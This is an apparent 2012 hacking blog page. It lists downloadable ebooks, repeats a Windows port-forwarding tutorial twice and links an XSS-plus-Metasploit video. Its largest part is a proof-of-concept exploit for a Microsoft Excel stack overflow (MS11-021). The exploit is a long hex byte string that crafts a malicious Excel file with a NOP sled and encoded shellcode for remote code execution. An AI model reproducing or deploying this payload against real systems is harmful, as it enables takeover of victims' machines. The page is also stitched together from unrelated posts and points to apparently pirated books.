Thursday, October 4, 2012

150 free Hacking Ebooks Collection

1. HACKING - GENERAL

Coding+Tut
Computer Virus 4 Dummies
Ethical Hacking and Countermeasures
Extreme Tech Hacking Gmail
Google_Secrets
Gray_Hat_Hacking
Hacking Exposed 6th Edition
Hacking For Beginners
Hacking for Dummies - Kevin Beaver
Hacking Secrets Revealed
How To Hack Hacker Highschool
Kevin Mitnick - Ghost in the wires
Kevin Mitnick - The Art of Deception
Kevin Mitnick - The Art of Intrusion
Telnet Tutorial
The Ethical Hack
The Hackers Underground Handbook
Website_Hacking_Secrets
Wi-fi security


Download Click Here


2. SQL TUTORIALS

Mastering_MySQL_4.2003.Sybex
MySQL - 2nd Edition (Sams)
MySQL - Essential Skills (2004)
MySQL - Visual QuickStart Guide, 2nd Edition (2006)
MySQL Certification Study Guide (2004)
MySQL Cookbook (2002)
MySQL Cookbook
MySQL Pocket Reference (2003)
MySQL Tutorial (2003)
MySQL.PHP.Database.Applications
SQL - A Beginner's Guide, 2nd Edition (2003)
SQL - Practical Guide For Developers (2005)
SQL Bible (2003)
SQL Cookbook (2005)
SQL For Dummies, 6th Edition (2006)
SQL Sams Teach Yourself MySQL in 21 Days -- SAMS
SQL Server 2000


Download Click Here


3. NETWORK SECURITY

Cryptography And Network Security, 4th Edition (2005).chm
Designing And Implementing Linux Firewalls And QoS (2006)
Firewall Policies And VPN Configurations (2006)
Fundamentals of Network Security
LANSecurity
Maximum Computer Security-A Hacker's Guide
McGraw Hill - Hacking Exposed - Network Security, Secrets
Network Security Assessment - From Vulnerability To Patch (2006)
Network Security Hacks - 100 Industrial-Strength Tips & Tools
Network Security With OpenSSL (2002)
Self-Defending Networks - The Next Generation Of Network Security


Download Click Here


4. NETWORK PROGRAMMING

Illustrated TCP-IP - A Graphic Guide To The Protocol Suite (1999)
Prentice Hall - Internetworking with TCP-IP, Volume I - Principles, Protocols and Architecture
Prentice Hall - Internetworking with TCPIP - Vol 3 Client-Server Programming and Applications for the BSD
Sockets Version
Tcp Ip For Dummies
TCP-IP Foundations (2004)
TCP-IP Network Administration, 3rd Edition (2002)
TCPIPSettingsinDOS
TCPIP Tools
Understanding TCP-IP (2006)
Unix Network Programming - Volume I - The Sockets Networking API, 3rd Edition (2003)


Download Click Here


5. UNIX

A Practical Guide To Linux Commands, Editors, And Shell Programming (2005)
Absolute BSD - The Ultimate Guide To FreeBSD (2002)
Absolute OpenBSD - Unix For The Practical Paranoid 2003
Embedded FreeBSD Cookbook (2002)
Get_Acquainted_with_Linux_Security_and_Optimizatio n_System
Hack Proofing Linux - A Guide To Open Source Security (2001)
Learning the UNIX Operating System 4th ed 1998.
Linux Basic Commands
Linux Kernel Development, 2nd Edition
Linux Kernel module programming guide 1
Linux Shell Scripting With Bash (2004)
linuxKernelSux
Linux_Administration_Made_Easy
Linux_Administrators_Security_Guide
Mastering FreeBSD And OpenBSD Security (2005)
McGraw.Hill.HackNotes.Linux.and.Unix.Security.Port able.Reference.eBook-DDU
OReilly - Linux_Network_Administrator's_Guide_Second_Edition
OReilly.Understanding.The Linux Kernel 1st Edition
Sam teach you Linux in 24 hours
Securing Linux A Survival Guide for Linux Security Version 1.0
Securing Linux Server for Service Providers
SELinux (2004)
shell-scripting
SysAdmin - Security Tools in FreeBSD
Teach Yourself FreeBSD In 24 Hours (2003)
The Complete FreeBSD, 4th Edition (2003)
The OpenBSD 4.0 Crash Course (2007)
Understanding The Linux Kernel, 3rd Edition (2005)
Unix Power Tools, 3rd Edition (2002).chm
Unix Shell Programming, 3rd Edition (2003)


Download Click Here


6. PROGRAMMING

Advanced Perl Programming, 2nd Edition (2005)
Assembly Language Step-By-Step - Programming With DOS And Linux, 2nd Edition (2000)
Beginning Linux Programming
Beginning Perl Web Development - From Novice To Professional (2006)
Burtch - Linux Shell Scripting with Bash (2004)
C By Example (1999)
C In A Nutshell (2005).chm
C Primer Plus, 5th Edition (2004)
C-C++ Programmer's Reference, 3rd Edition (2003)
Cryptography In C And C++ (2001)
Effective C++, 3rd Edition (2005)
Glass,Ables - Linux for Programmers and Users (Prentice, 2006)
Guide To Assembly Language Programming In Linux (2005)
Hacker Disassembling Uncovered
Intermediate Perl (2006)
Korn Shell Unix and Linux Programming Manual, 3rd ed 2001
Learning Perl Objects, References, & Modules (2003)
Learning Perl, 4th Edition (2005)
Learning PHP & MySQL (2006)
Matthew - Beginning Linux Programming 4e (Wrox, 2007)
Michael - Mastering UNIX Shell Scripting (Wiley, 2003)
Minimal Perl For UNIX And Linux People (2005)
Mitchell - Advanced Linux Programming (New Riders, 2001)
Optimizing C++ (1999)
Perl Best Practices (2005)
Perl Cookbook
Perl Hacks - Tips And Tools For Programming Debugging And Surviving (2006)
Perl Medic - Transforming Legacy Code (2004)
Programming Embedded Systems In C And C++ (1999)
Secure Programming Cookbook For C And C++ (2003)
Wall - Linux Programming Unleashed (SAMS, 1999)


Download Click Here


7. EXPLOIT

Extreme Exploits - Advanced Defenses Against Hardcore Hacks (2005)
Hacking - The Art Of Exploitation (2003)
Shellcoder's Programming Uncovered (2005)
The Shellcoder's Handbook - Discovering And Exploiting Security Holes (2004)


Download Click Here

[TUT] Advanced Port Fowarding! (ALL MODEMS/ROUTERS)

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Hello Alboraaq user!

★Are you tired of not being able to open your ports?★
★Well im going to fix that right now!★

Step 1:
Start button > Control Panel > View Network status and Tasks.
Next you will be prompted with something that looks a little like this.

http://dl.dropbox.com/u/29987593/f65f0e722d957dc1f8b5a905fa16dcc0.png




Step 2:
Click Network > under Network Infrastructure you should see your modem >
Right click properties.
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm




Step 3:

Click settings > add > Now for description you can put anything >
where it says name or ip address fill in your ipv4.
View the spoiler to learn how to get it!

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm



Step 4:
Type in the port you want to open > under both boxes > click ok,
Your going to have to do this once more > click add and now where it says TCP/UDP click UDP > press ok.

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm



End Result: canyouseeme.org

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm



HOORAY! you can now use your clients, if you have any questions/comments/feedback please post! Lets keep this tutorial alive!

[TUT] Advanced Port Fowarding! (ALL MODEMS/ROUTERS)

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Hello Alboraaq user!

★Are you tired of not being able to open your ports?★
★Well im going to fix that right now!★

Step 1:
Start button > Control Panel > View Network status and Tasks.
Next you will be prompted with something that looks a little like this.

http://dl.dropbox.com/u/29987593/f65f0e722d957dc1f8b5a905fa16dcc0.png




Step 2:
Click Network > under Network Infrastructure you should see your modem >
Right click properties.
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm




Step 3:

Click settings > add > Now for description you can put anything >
where it says name or ip address fill in your ipv4.
View the spoiler to learn how to get it!

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm



Step 4:
Type in the port you want to open > under both boxes > click ok,
Your going to have to do this once more > click add and now where it says TCP/UDP click UDP > press ok.

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm



End Result: canyouseeme.org

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm



HOORAY! you can now use your clients, if you have any questions/comments/feedback please post! Lets keep this tutorial alive!

Kết Hợp Khai thác giữa XSS + MSF

Leech sang MF cho ae down cho tiện.

http://www.mediafire.com/?89upicy6538obuj

Pass: vhb


P/S: Link MediaFire by Juno_okyo.

Microsoft Office Excel Stack Overflow

# Title : Microsoft Office Excel Stack Overflow
# Auther : Senator of Pirates (Khalil Zhani)
# FaceBook : /SenatorofPiratesInfo
# E-Mail : Senator.of.Pirates.team[at]gmail.com
# Greeting : Special thanks to my best friend Mr. Marshal Webb
# Tested : on windowns XP SP3(EN) with Microsoft Office Excel 2003

A remote code execution vulnerability exists in the way that Microsoft Excel handles specially
crafted Excel files. An attacker who successfully exploited this vulnerability could take complete control
of an affected system. This is the same vulnerability that is referenced in MS11-021. Proof of concept exploit code included.

PoC =("\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x3E\x00\x03\x00\xFE\xFF\x09\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x01\x00\x00\x00"

"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x22\x00\x00\x00\x01\x00\x00\x00​\xFE\xFF\xFF\xFF"

"\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFD\xFF\xFF\xFF\x25\x00\x00\x00\x03\x00\x00\x00​\x04\x00\x00\x00"

"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00\x09\x00\x00\x00​\x0B\x00\x00\x00"

"\x0B\x00\x00\x00\x0C\x00\x00\x00\x0D\x00\x00\x00\x0E\x00\x00\x00\x0F\x00\x00\x00​\x10\x00\x00\x00"

"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00\x15\x00\x00\x00​\x16\x00\x00\x00"

"\x17\x00\x00\x00\x18\x00\x00\x00\x19\x00\x00\x00\x1A\x00\x00\x00\x1B\x00\x00\x00​\x1C\x00\x00\x00"

"\x1D\x00\x00\x00\x1E\x00\x00\x00\x1F\x00\x00\x00\x20\x00\x00\x00\x21\x00\x00\x00​\xFE\xFF\xFF\xFF"

"\xFE\xFF\xFF\xFF\x24\x00\x00\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x52\x00\x6F\x00​\x6F\x00\x74\x00"

"\x02\x00\x45\x00\x6E\x00\x74\x00\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x08\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\x02\x00\x00\x00"

"\x20\x08\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x50\x42\x86\x2A\xFB\x9F\xCA\x01\x23\x00\x00\x00\xC0\x02\x00\x00​\x00\x00\x00\x00"

"\x57\x00\x6F\x00\x72\x00\x6B\x00\x62\x00\x6F\x00\x6F\x00\x6B\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x02\x01​\x04\x00\x00\x00"

"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x02\x00\x00\x00"

"\x7A\x3F\x00\x00\x00\x00\x00\x00\x09\x00\x53\x00\x75\x00\x6D\x00\x6D\x00\x61\x00​\x72\x00\x79\x00"

"\x49\x00\x6E\x00\x66\x00\x6F\x00\x72\x00\x6D\x00\x61\x00\x74\x00\x69\x00\x6F\x00​\x6E\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x28\x00\x02\x01\x01\x00\x00\x00\x03\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x44\x00​\x6F\x00\x63\x00"

"\x75\x00\x6D\x00\x65\x00\x6E\x00\x74\x00\x53\x00\x75\x00\x6D\x00\x6D\x00\x61\x00​\x72\x00\x79\x00"

"\x49\x00\x6E\x00\x66\x00\x6F\x00\x72\x00\x6D\x00\x61\x00\x74\x00\x69\x00\x6F\x00​\x6E\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x38\x00\x02\x01\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF​\xFF\xFF\xFF\xFF"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00​\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x08\x01\x00\x00​\x00\x00\x00\x00"

"\x09\x08\x10\x00\x00\x06\x00\x04\xAA\x1F\xCD\x07\xC9\x00\x05\x00\x06\x04\x00\x00​")

# fields

PoC +=("\xA7\x00\x04\x00\xB0\x0F\x0C\x00\x3C\x00\x00\x03")

# Data + Nops + Shellcode

PoC +=("\x40\xDF\xD6\xD5\x3B\xDF\xD6\xD5\x3B\x00\x00\x00\x00\x00\x00\x00\x00\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xD7\x71\x10\x30\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x50\xFF\x61\x31\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90​\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x20\x65\x02​\x44\xDB\xC2\xD9"

"\x74\x24\xF4\x5A\x33\xC9\xB1\x32\x31\x42\x12\x03\x42\x12\x83\xCA\x99\xE0\xB1\xF6​\x8A\x6C\x39\x06"

"\x4B\x0F\xB3\xE3\x7A\x1D\xA7\x60\x2E\x91\xA3\x24\xC3\x5A\xE1\xDC\x50\x2E\x2E\xD3​\xD1\x85\x08\xDA"

"\xE2\x2B\x95\xB0\x21\x2D\x69\xCA\x75\x8D\x50\x05\x88\xCC\x95\x7B\x63\x9C\x4E\xF0​\xD6\x31\xFA\x44"

"\xEB\x30\x2C\xC3\x53\x4B\x49\x13\x27\xE1\x50\x43\x98\x7E\x1A\x7B\x92\xD9\xBB\x7A​\x77\x3A\x87\x35"

"\xFC\x89\x73\xC4\xD4\xC3\x7C\xF7\x18\x8F\x42\x38\x95\xD1\x83\xFE\x46\xA4\xFF\xFD​\xFB\xBF\x3B\x7C"

"\x20\x35\xDE\x26\xA3\xED\x3A\xD7\x60\x6B\xC8\xDB\xCD\xFF\x96\xFF\xD0\x2C\xAD\xFB​\x59\xD3\x62\x8A"

"\x1A\xF0\xA6\xD7\xF9\x99\xFF\xBD\xAC\xA6\xE0\x19\x10\x03\x6A\x8B\x45\x35\x31\xC1​\x98\xB7\x4F\xAC"

"\x9B\xC7\x4F\x9E\xF3\xF6\xC4\x71\x83\x06\x0F\x36\x7B\x4D\x12\x1E\x14\x08\xC6\x23​\x79\xAB\x3C\x67"

"\x84\x28\xB5\x17\x73\x30\xBC\x12\x3F\xF6\x2C\x6E\x50\x93\x52\xDD\x51\xB6\x30\x80​\xC1\x5A\xB7\x41"

"\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00​\x04\x01\x01\x00"

"\x38\x00\xBC\x02\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00​\x62\x00\x72\x00"

"\x69\x00\x31\x00\x1E\x00\xDC\x00\x01\x00\x38\x00\xBC\x02\x00\x00\x00\x02\x00\xFA​\x07\x01\x43\x00"

"\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x00\x00​\x11\x00\x90\x01"

"\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00​\x69\x00\x31\x00"

"\x1E\x00\xDC\x00\x00\x00\x14\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00​\x61\x00\x6C\x00"

"\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x00\x00\x3C\x00\x90\x01​\x00\x00\x00\x02"

"\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00​\x1E\x00\xDC\x00"

"\x00\x00\x3E\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00​\x69\x00\x62\x00"

"\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x01\x00\x3F\x00\xBC\x02\x00\x00\x00\x02​\x00\xFA\x07\x01"

"\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00​\x01\x00\x34\x00"

"\xBC\x02\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00​\x72\x00\x69\x00"

"\x31\x00\x1E\x00\xDC\x00\x00\x00\x34\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01​\x43\x00\x61\x00"

"\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x01\x00\x09\x00​\xBC\x02\x00\x00"

"\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00​\x31\x00\x1E\x00"

"\xDC\x00\x00\x00\x0B\x00\x90\x01\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00​\x6C\x00\x69\x00"

"\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00\xDC\x00\x02\x00\x17\x00\x90\x01\x00\x00​\x00\x02\x00\xFA"

"\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x31\x00\x1E\x00​\xDC\x00\x01\x00"

"\x08\x00\xBC\x02\x00\x00\x00\x02\x00\xFA\x07\x01\x43\x00\x61\x00\x6C\x00\x69\x00​\x62\x00\x72\x00"

"\x69\x00\x31\x00\x1E\x00\xDC\x00\x00\x00\x09\x00\x90\x01\x00\x00\x00\x02\x00\xFA​\x07\x01\x43\x00"

"\x61\x00\x6C\x00\x69\x00\x62\x00\x72\x00\x69\x00\x1E\x04\x1C\x00\x05\x00\x17\x00​\x00\x22\x24\x22"

"\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x5C\x29​\x1E\x04\x21\x00"

"\x06\x00\x1C\x00\x00\x22\x24\x22\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5B\x52\x65\x64​\x5D\x5C\x28\x22"

"\x24\x22\x23\x2C\x23\x23\x30\x5C\x29\x1E\x04\x22\x00\x07\x00\x1D\x00\x00\x22\x24​\x22\x23\x2C\x23"

"\x23\x30\x2E\x30\x30\x5F\x29\x3B\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30​\x30\x5C\x29\x1E"

"\x04\x27\x00\x08\x00\x22\x00\x00\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30\x30\x5F​\x29\x3B\x5B\x52"

"\x65\x64\x5D\x5C\x28\x22\x24\x22\x23\x2C\x23\x23\x30\x2E\x30\x30\x5C\x29\x1E\x04​\x37\x00\x2A\x00"

"\x32\x00\x00\x5F\x28\x22\x24\x22\x2A\x20\x23\x2C\x23\x23\x30\x5F\x29\x3B\x5F\x28​\x22\x24\x22\x2A"

"\x20\x5C\x28\x23\x2C\x23\x23\x30\x5C\x29\x3B\x5F\x28\x22\x24\x22\x2A\x20\x22\x2D​\x22\x5F\x29\x3B"

"\x5F\x28\x40\x5F\x29\x1E\x04\x2E\x00\x29\x00\x29\x00\x00\x5F\x28\x2A\x20\x23\x2C​\x23\x23\x30\x5F"

"\x29\x3B\x5F\x28\x2A\x20\x5C\x28\x23\x2C\x23\x23\x30\x5C\x29\x3B\x5F\x28\x2A\x20​\x22\x2D\x22\x5F"

"\x29\x3B\x5F\x28\x40\x5F\x29\x1E\x04\x3F\x00\x2C\x00\x3A\x00\x00\x5F\x28\x22\x24​\x22\x2A\x20\x23"

"\x2C\x23\x23\x30\x2E\x30\x30\x5F\x29\x3B\x5F\x28\x22\x24\x22\x2A\x20\x5C\x28\x23​\x2C\x23\x23\x30"

"\x2E\x30\x30\x5C\x29\x3B\x5F\x28\x22\x24\x22\x2A\x20\x22\x2D\x22\x3F\x3F\x5F\x29​\x3B\x5F\x28\x40"

